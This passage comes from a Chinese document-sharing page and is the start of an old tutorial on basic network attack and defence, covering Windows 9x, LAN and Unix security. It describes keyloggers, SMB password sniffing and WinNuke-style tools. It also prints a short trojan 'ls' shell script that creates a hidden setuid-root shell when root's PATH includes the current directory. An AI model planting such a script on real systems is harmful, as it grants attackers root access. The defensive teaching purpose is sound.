欢迎来到天天文库
浏览记录
ID:43032159
大小:78.01 KB
页数:10页
时间:2019-09-25
《网络攻防基础教程》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、网络攻防的基础教程制作:shaokejian单机安全 你有一台电脑,平时用来上上网,玩玩游戏,偶尔也敲点公文进去,你认为它挺安全的,但有一天,你的朋友突然告诉你,他有你的上网帐号和密码,你相信吗?――不要不信,这种方法挺多的,假如你用的是WINDOWS,假如你拨号上网的密码写了保存,那任何人只要在你的电脑上运行某个小软件就…… 我从来不保存什么密码――你可能要得意的说,但――你的朋友在你电脑里装了一个木马,可以捕捉拨号网络那个“连接到”的Caption,然后记下你所按的键盘,悄悄地将文件写入一个加密过的文本后再自动退出――会点编程的人应该都做得
2、到,你的电脑是不是失守了? 设了屏幕保护密码――天啊,重启动后还有什么? 设定了管理策略,用策略编辑器编辑过,如果不输密码他就进不了,进去了也什么都干不成!――把你的user.dat和system.dat删掉后用我的代替,这个主意你认为怎么样? 当然我不是让你杯弓蛇影弄得一个朋友都没有只能形影相吊――这样活着太没劲啦! 如果你的电脑没有机密资讯的话当然无所谓,如果有――保证尽量少的人接触它!写了这么多都是WIN9X的,UNIX系统里这方面的问题是不是就少了呢?从物理方面来说,如果一台机器摆放的位置不安全,能让人有足够的时间打开机箱做一些
3、手脚,你的机器就无法安全,就拿我的机子来说吧,我有两块硬盘,但在WIN9X和NT里都看不到第二块硬盘的影子――我把它装上了LINUX,而且只能从一个特定的地方启动它,启动之后,在LINUX下,我可以任意的用mount命令装其它操作系统里的所有数据一扫而空局域网安全 基于同样的道理,局域网中的电脑在物理上仍然要严加控制,同时还要经常性地注意局域网中用户的一些非正常的举动――为什么?这还用问,就拿我身边的例子来说吧,我有个朋友,公司里三十多台电脑连成一个局域网,但这家伙总想弄到主机的最高权限,于是乎监听SMB密文、安装木马忙得不亦乐乎――最后呢,当然得
4、手了,毕竟是我的哥们嘛:) 还有,比如在UNIX中最好要限制ROOT只能由主控台(console)登录、要谨慎使用su命令等等,不然都会给同一网域内的一群“虎视眈眈”想获取最高权限者以机会…… 辟如说:shell环境变量PATH中包含用冒号分开的目录名清单,shell按照清单中给定的顺序搜索这些目录,找出运行的命令的可执行文件,PATH变量的典型内容如下:10 $echo$PATH .:/usr/local/bin:/bin:/usr/bin/:/usr/X11/bin 但如果你是ROOT的话,无论如何要把PATH变量从当前目录开始
5、搜索的设置去掉,不然请考虑下面的可能性:甲请你过去在他的终端上做某些管理员职能,你去了,su成ROOT,执行用户要求你做的系统命令后退出ROOT帐号――无懈可击,但如果用户将在他的目录下做了一个假的su程序……那么你是从当前目录也就是甲的目录开始搜索的,天啊,你执行的是一个根本不知情的程序,可能是用户自己编写的特洛伊程序,用以记录你的密码…… 根据上面的原理,你看看如果ROOT不去掉本地目录的话,下面这段代码可能有什么用处吧 #!/bin/sh cp/bin/sh./stuff/junk/.superdude chmod4555./stuff
6、/junk/.superdude rm-f$0 exec/bin/ls${1+"$@"} 然后 %cd %chmod700. %touch./-f 明白了吗?这个ls建立了一个隐藏的setuidroot的shell的copy…… 远程安全与黑客常用方法 1、针对个人用户 个人用户在网上最常遇到的“侵略性”的行为不外乎以下几种 @垃圾邮件这是一个永恒但又无奈的话题,垃圾邮件包括了诸如一些赚钱、广告之类的信件和恶意的人们通过邮件炸弹发来“成吨重”的信件,这不需要任何技巧,也最是无聊――我收到的此类信件多如牛毛呀!对付此类信
7、件远程登陆删除就行了,也没有必要非查出该发信人的行踪再施以报复――网上这种东西太多,可谓野火烧不尽……然后在信箱配置上设定拒收某些人、或者超大的信件就行了,这种垃圾不在我们的讨论范围之内。 @蓝屏炸弹 10这是针对WIN95的OOB漏洞而开发出来的一些小软件,多命名为*NUKE等等,以前是专门攻击139端口,被攻击的计算机多会出现M$著名的蓝屏蓝屏错误,WIN98下此漏洞已经PATCH上,所以大多数NUKE软件都已失效了,但最近听说一个叫VOOB的软件对WIN98仍然有效――我还没试过呢,要不要拿你开刀?该软件界面如下:(此类软件界面大抵如此,使用
8、简单无比) 要防范此类软件的攻击,一个土办法就是监听端口,网上有许多监听端口的软件,你只要
此文档下载收益归作者所有